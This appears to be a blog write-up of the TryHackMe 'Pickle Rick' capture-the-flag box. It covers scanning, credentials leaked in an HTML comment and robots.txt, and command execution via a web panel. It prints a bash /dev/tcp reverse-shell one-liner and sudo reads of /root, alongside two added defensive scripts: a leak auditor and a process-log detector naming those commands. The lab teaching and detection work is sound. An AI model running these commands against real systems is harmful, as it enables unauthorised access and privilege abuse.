Pickle Rick – Easy
In this post, we’ll cover another CTF machine made by TryHackMe.
Enumeration
nmap -sC -sV {ipaddress}
nikto -host {ipaddress}
gobuster dir -u http://{ipaddress} -w /usr/share/wordlists/dirb/common.txt
The nmap scan showed only two open ports, 22 and 80. As soon as the nmap scan finished, I ran nikto and gobuster scans against the host.
Meanwhile, I browsed the web application looking for any disclosed information or hints.
Upon analysis, I found the username “R1ckRul3s” in an HTML comment on the home page.
Additionally, the contents of “robots.txt” were unusual.
Further analysis showed that, using the username “R1ckRul3s” and the contents of “robots.txt” as the password, I was able to log in to the application.
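Both leaks above (a username in an HTML comment and a non-directive line in robots.txt) are easy to catch before a box goes live. The following audit helper is an added example, not part of the original write-up or the TryHackMe room; the sample HTML and robots.txt are constructed, and "EXAMPLE_SECRET_STRING" is a placeholder standing in for whatever odd text the real file carried. It flags HTML comments that mention credential-like words and any robots.txt line that is neither a comment nor a known directive.

```python
"""Offline audit: find credential hints in HTML comments and stray lines in robots.txt."""
import re
from html.parser import HTMLParser

# Directives a well-formed robots.txt may contain (lower-cased names before the colon).
ROBOTS_DIRECTIVES = {"user-agent", "disallow", "allow", "sitemap", "crawl-delay", "host"}

# Words that suggest a comment is talking about an account or a secret.
CREDENTIAL_HINT = re.compile(r"(user(name)?|login|pass(word)?|pwd|token|secret)", re.I)


class CommentCollector(HTMLParser):
    """Collects the text of every <!-- ... --> comment in a page."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def suspicious_html_comments(html):
    """Return the HTML comments that mention usernames, passwords, tokens, etc."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return [c for c in parser.comments if CREDENTIAL_HINT.search(c)]


def unusual_robots_lines(robots_txt):
    """Return (line_no, text) for lines that are neither comments nor robots directives."""
    odd = []
    for line_no, raw in enumerate(robots_txt.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, sep, _ = line.partition(":")
        if sep and name.strip().lower() in ROBOTS_DIRECTIVES:
            continue
        odd.append((line_no, line))
    return odd


# Constructed sample page: one comment leaks the username seen in the write-up.
SAMPLE_HTML = """<html><body>
<h1>Help Morty!</h1>
<!-- Note to self, remember username! Username: R1ckRul3s -->
<!-- TODO: fix the CSS -->
</body></html>"""

# Constructed sample robots.txt: line 3 is not a directive and should be flagged.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /admin/
EXAMPLE_SECRET_STRING
"""

if __name__ == "__main__":
    print("comments:", suspicious_html_comments(SAMPLE_HTML))
    print("robots  :", unusual_robots_lines(SAMPLE_ROBOTS))
```

Run it against your own rendered pages (the HTML your server actually emits, not the templates) so that comments injected by build tooling are covered as well.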
Exploitation
Once logged in to the application, we are presented with the Command Panel, where we can run system commands. Running “ls -al” shows that there are two files “Sup3rwhatever.txt” and “clue.txt”.
Let’s read the contents of both files:
less Sup3rwhatever.txt
less clue.txt
Looking around the file system, I found another file named “second ingredients” inside rick’s home directory.
I used the following commands to set up a reverse shell and get the 3rd flag.
# Command to get a reverse shell
bash -c 'bash -i >& /dev/tcp/{ipaddress}/4050 0>&1'
# List what the user can run as sudo
sudo -l
# List the contents of the "/root" directory
sudo ls -al /root
# Get the 3rd flag value
sudo less /root/3rd.txt
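Every step of this chain leaves a distinctive process record: the web server account spawning a shell, a bash /dev/tcp reverse shell, sudo rights enumeration, and a sudo read of files under /root. The detector below is an added example, not code from the original write-up; the log format ("<timestamp> <user> <command>") and the sample lines are constructed, and the IP 10.0.0.5 is a placeholder. It tags each process event with the indicators it matches.

```python
"""Detection logic for the post-exploitation steps above, run over constructed process events."""
import re

WEB_ACCOUNTS = {"www-data", "apache", "nginx", "httpd"}
SHELLS = {"sh", "bash", "dash", "zsh"}

# bash's /dev/tcp pseudo-device or an interactive bash with redirected stdout/stderr.
REVERSE_SHELL = re.compile(r"/dev/tcp/\S+/\d+|bash\s+-i\s*>&")
# Listing allowed sudo commands.
SUDO_ENUM = re.compile(r"^sudo\s+-l\b")
# Reading or listing anything under /root through sudo.
SUDO_ROOT_READ = re.compile(r"^sudo\s+(cat|less|more|head|tail|ls)\s+.*?/root\b")


def classify(user, cmd):
    """Return the list of indicator tags matched by one (user, command line) pair."""
    tags = []
    argv = cmd.split()
    argv0 = argv[0].rsplit("/", 1)[-1] if argv else ""
    if user in WEB_ACCOUNTS and argv0 in SHELLS:
        tags.append("web_account_spawned_shell")
    if REVERSE_SHELL.search(cmd):
        tags.append("bash_dev_tcp_reverse_shell")
    if SUDO_ENUM.search(cmd):
        tags.append("sudo_rights_enumeration")
    if SUDO_ROOT_READ.search(cmd):
        tags.append("sudo_read_of_root_dir")
    return tags


def scan_log(lines):
    """Each line is '<timestamp> <user> <command...>'; return (line_no, user, tags) for hits."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        parts = line.split(maxsplit=2)
        if len(parts) < 3:
            continue
        _ts, user, cmd = parts
        tags = classify(user, cmd)
        if tags:
            hits.append((line_no, user, tags))
    return hits


# Constructed sample events mirroring the chain in the write-up (10.0.0.5 is a placeholder).
SAMPLE_LOG = [
    "2024-01-01T10:00:01 www-data ls -al",
    "2024-01-01T10:00:05 www-data bash -c bash -i >& /dev/tcp/10.0.0.5/4050 0>&1",
    "2024-01-01T10:01:10 www-data sudo -l",
    "2024-01-01T10:01:30 www-data sudo less /root/3rd.txt",
    "2024-01-01T10:02:00 rick bash -l",
]

if __name__ == "__main__":
    for line_no, user, tags in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {user}: {', '.join(tags)}")
```

The first tag alone (a web-server account running a shell) is the cheapest and most reliable signal here; the command panel's whole purpose is to make www-data execute arbitrary commands, and a sudoers rule that grants that account unrestricted sudo is what turns it into a root compromise.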
Thank you for reading and stay tuned for new write-ups.
Happy Hunting!
Posted by: infinity